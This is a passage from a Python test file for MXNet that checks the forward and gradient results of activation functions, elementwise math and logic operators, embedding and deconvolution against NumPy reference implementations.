# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
